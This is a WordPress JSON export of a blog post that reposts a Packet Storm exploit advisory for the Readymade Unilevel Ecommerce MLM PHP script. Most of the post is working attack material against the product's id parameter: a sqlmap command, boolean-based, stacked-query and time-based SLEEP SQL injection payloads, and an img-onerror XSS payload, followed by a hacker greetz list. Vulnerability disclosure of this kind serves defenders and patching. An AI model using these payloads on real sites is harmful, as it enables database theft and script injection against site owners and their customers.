{"id":58599,"date":"2024-08-02T19:40:41","date_gmt":"2024-08-02T16:40:41","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179886\/rmulecommmlm-sqlxss.txt"},"modified":"2024-08-02T19:40:41","modified_gmt":"2024-08-02T16:40:41","slug":"readymade-unilevel-ecommerce-mlm-blind-sql-injection-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/readymade-unilevel-ecommerce-mlm-blind-sql-injection-cross-site-scripting\/","title":{"rendered":"ReadyMade Unilevel Ecommerce MLM Blind SQL Injection \/ Cross Site Scripting"},"content":{"rendered":"[x]========================================================================================================================================[x]| Title : Readymade Unilevel Ecommerce MLM Blind SQL &amp; XSS Vulnerabilities<br \/>| Software : Readymade Unilevel Ecommerce<br \/>| Last Update : 15\/03\/24 [TESTED VERSION SCRIPT]| First Release: 16\/11\/21<br \/>| Vendor : http:\/\/www.i-netsolution.com\/<br \/>| Date : 01 Agustus 2024<br \/>| Author : OoN_Boy<br \/>[x]========================================================================================================================================[x]| Technology : PHP<br \/>| Database : MySQL<br \/>| Price : $500<br \/>| Description : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.<br \/>[x]========================================================================================================================================[x]\n[O] Exploit<\/p>\n<p>http:\/\/localhost\/eommlm\/product-details.php?id=11[SQL]http:\/\/localhost\/ecomlm\/product-details.php?id=11[XSS]\n[O] Proof of concept<\/p>\n<p>sqlmap.py -u &#8220;http:\/\/localhost\/eommlm\/product-details.php?id=11&#8221; &#8211;invalid-string<\/p>\n[SQL]Parameter: id (GET)<br \/>Type: boolean-based blind<br \/>Title: AND boolean-based blind &#8211; WHERE or HAVING clause<br \/>Payload: id=11 AND 1189=1189<\/p>\n<p>Type: stacked queries<br \/>Title: MySQL &gt;= 5.0.12 stacked queries (comment)<br \/>Payload: id=11;SELECT SLEEP(10)#<\/p>\n<p>Type: time-based blind<br \/>Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)<\/p>\n[XSS] <br \/>http:\/\/localhost\/ecomlm\/product-details.php?id=11&#8243;&gt;&lt;img\/src\/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY&gt;<\/p>\n[x]========================================================================================================================================[x]\n[O] Greetz<\/p>\n<p>BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<\/p>\n[x]========================================================================================================================================[x]\n","protected":false},"excerpt":{"rendered":"<p>[x]========================================================================================================================================[x]| Title : Readymade Unilevel Ecommerce MLM Blind SQL &amp; XSS Vulnerabilities| Software : Readymade Unilevel Ecommerce| Last Update : 15\/03\/24 [TESTED VERSION SCRIPT]| First Release: 16\/11\/21| Vendor : http:\/\/www.i-netsolution.com\/| Date : 01 Agustus 2024| Author : OoN_Boy[x]========================================================================================================================================[x]| Technology : PHP| Database : MySQL| Price : $500| Description : MLM Unilevel Plan Script developed by &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58599","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58599","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58599"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58599\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58599"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58599"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58599"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}